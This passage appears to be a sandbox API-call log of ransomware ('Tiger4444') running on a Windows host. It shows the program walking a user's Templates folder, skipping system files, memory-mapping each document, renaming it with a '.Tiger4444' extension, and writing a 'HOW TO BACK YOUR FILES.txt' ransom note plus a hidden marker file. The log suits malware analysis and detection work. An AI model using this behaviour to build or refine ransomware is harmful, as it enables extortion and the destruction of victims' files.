lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.983] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.983] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14343587169) returned 1 [0051.983] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=380006) returned 1 [0051.983] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0051.983] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0051.983] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5cf70, lpName=0x0) returned 0x2a4 [0051.984] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5cf70) returned 0x30b0000 [0052.005] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0052.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0052.006] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14345912918) returned 1 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.006] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0052.006] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0052.009] CloseHandle (hObject=0x2a4) returned 1 [0052.010] CloseHandle (hObject=0x2c8) returned 1 [0052.010] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.Tiger4444") returned 84 [0052.010] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm.tiger4444"), dwFlags=0x1) returned 1 [0052.011] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="Tiger4444.exe") returned -1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2=".") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="..") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="windows") returned -1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="bootmgr") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="pagefile.sys") returned -1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="boot") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="ids.txt") returned 1 [0052.011] lstrcmpiW (lpString1="LiveContent", lpString2="NTUSER.DAT") returned -1 [0052.011] lstrcpyW (in: lpString1=0x30aeb10, lpString2="LiveContent" | out: lpString1="LiveContent") returned="LiveContent" [0052.011] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916e8 [0052.011] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x80) returned 0xc71a60 [0052.011] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916f0 | out: ListHead=0xc66828, ListEntry=0xc916f0) returned 0xc914b0 [0052.011] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1594be7a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1594be7a, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a0aa18, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x4605, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="Tiger4444.exe") returned -1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2=".") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="..") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="windows") returned -1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="bootmgr") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="pagefile.sys") returned -1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="boot") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="ids.txt") returned 1 [0052.011] lstrcmpiW (lpString1="Normal.dotm", lpString2="NTUSER.DAT") returned -1 [0052.011] lstrcpyW (in: lpString1=0x30aeb10, lpString2="Normal.dotm" | out: lpString1="Normal.dotm") returned="Normal.dotm" [0052.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", dwFileAttributes=0x0) returned 1 [0052.012] lstrlenW (lpString="Normal.dotm") returned 11 [0052.012] lstrlenW (lpString="Tiger4444") returned 9 [0052.012] lstrcmpiW (lpString1="rmal.dotm", lpString2="Tiger4444") returned -1 [0052.012] lstrlenW (lpString=".dll") returned 4 [0052.012] lstrcmpiW (lpString1="dotm", lpString2=".dll") returned 1 [0052.012] lstrlenW (lpString=".lnk") returned 4 [0052.012] lstrcmpiW (lpString1="dotm", lpString2=".lnk") returned 1 [0052.012] lstrlenW (lpString=".ini") returned 4 [0052.012] lstrcmpiW (lpString1="dotm", lpString2=".ini") returned 1 [0052.012] lstrlenW (lpString=".sys") returned 4 [0052.012] lstrcmpiW (lpString1="dotm", lpString2=".sys") returned 1 [0052.012] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.012] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.013] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14346565555) returned 1 [0052.013] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=17925) returned 1 [0052.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0052.013] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4910, lpName=0x0) returned 0x2a4 [0052.014] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4910) returned 0xbe0000 [0052.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0052.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0052.096] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14354898639) returned 1 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0052.096] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.096] CloseHandle (hObject=0x2a4) returned 1 [0052.096] CloseHandle (hObject=0x2c8) returned 1 [0052.096] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.Tiger4444") returned 73 [0052.096] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm.tiger4444"), dwFlags=0x1) returned 1 [0052.097] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xd92f3100, ftLastWriteTime.dwHighDateTime=0x1d32689, nFileSizeHigh=0x0, nFileSizeLow=0x78dd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Welcome to Excel.xltx", cAlternateFileName="WELCOM~1.XLT")) returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="Tiger4444.exe") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2=".") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="..") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="windows") returned -1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="bootmgr") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="pagefile.sys") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="boot") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ids.txt") returned 1 [0052.097] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="NTUSER.DAT") returned 1 [0052.097] lstrcpyW (in: lpString1=0x30aeb10, lpString2="Welcome to Excel.xltx" | out: lpString1="Welcome to Excel.xltx") returned="Welcome to Excel.xltx" [0052.098] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx", dwFileAttributes=0x0) returned 1 [0052.098] lstrlenW (lpString="Welcome to Excel.xltx") returned 21 [0052.098] lstrlenW (lpString="Tiger4444") returned 9 [0052.098] lstrcmpiW (lpString1="xcel.xltx", lpString2="Tiger4444") returned 1 [0052.098] lstrlenW (lpString=".dll") returned 4 [0052.098] lstrcmpiW (lpString1="xltx", lpString2=".dll") returned 1 [0052.098] lstrlenW (lpString=".lnk") returned 4 [0052.098] lstrcmpiW (lpString1="xltx", lpString2=".lnk") returned 1 [0052.098] lstrlenW (lpString=".ini") returned 4 [0052.098] lstrcmpiW (lpString1="xltx", lpString2=".ini") returned 1 [0052.098] lstrlenW (lpString=".sys") returned 4 [0052.098] lstrcmpiW (lpString1="xltx", lpString2=".sys") returned 1 [0052.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.098] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.098] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14355149223) returned 1 [0052.098] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=495058) returned 1 [0052.099] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.099] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0052.099] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790e0, lpName=0x0) returned 0x2a4 [0052.100] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790e0) returned 0x30b0000 [0052.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0052.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0052.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0052.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0052.121] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14357459556) returned 1 [0052.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0052.122] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0052.125] CloseHandle (hObject=0x2a4) returned 1 [0052.125] CloseHandle (hObject=0x2c8) returned 1 [0052.126] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.Tiger4444") returned 83 [0052.126] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx.tiger4444"), dwFlags=0x1) returned 1 [0052.126] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xd92f3100, ftLastWriteTime.dwHighDateTime=0x1d32689, nFileSizeHigh=0x0, nFileSizeLow=0x78dd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Welcome to Excel.xltx", cAlternateFileName="WELCOM~1.XLT")) returned 0 [0052.126] FindClose (in: hFindFile=0xc73088 | out: hFindFile=0xc73088) returned 1 [0052.126] lstrcpyW (in: lpString1=0x30aeb10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.127] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.127] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.128] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.128] CloseHandle (hObject=0x2c8) returned 1 [0052.128] CloseHandle (hObject=0x2ac) returned 1 [0052.128] GetCurrentThreadId () returned 0xfa8 [0052.128] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916f0 [0052.128] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0052.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0052.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916e8 | out: hHeap=0xc50000) returned 1 [0052.128] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0052.128] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\" [0052.128] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3" [0052.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.130] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.132] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.133] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.133] CloseHandle (hObject=0x2ac) returned 1 [0052.134] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned 63 [0052.134] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.134] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84163796, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.134] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.134] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.134] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.134] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.134] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84163796, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.134] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.134] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.134] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.134] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.134] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.134] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84163796, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84163796, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.134] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.134] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.134] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0052.135] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.135] lstrcmpiW (lpString1="16", lpString2="Tiger4444.exe") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0052.135] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0052.135] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0052.135] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0052.135] lstrcpyW (in: lpString1=0x30aeb28, lpString2="16" | out: lpString1="16") returned="16" [0052.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc914c8 [0052.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x86) returned 0xc791f8 [0052.135] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc914d0 | out: ListHead=0xc66828, ListEntry=0xc914d0) returned 0xc914b0 [0052.135] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0052.135] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.135] lstrcpyW (in: lpString1=0x30aeb28, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.135] CreateFileW 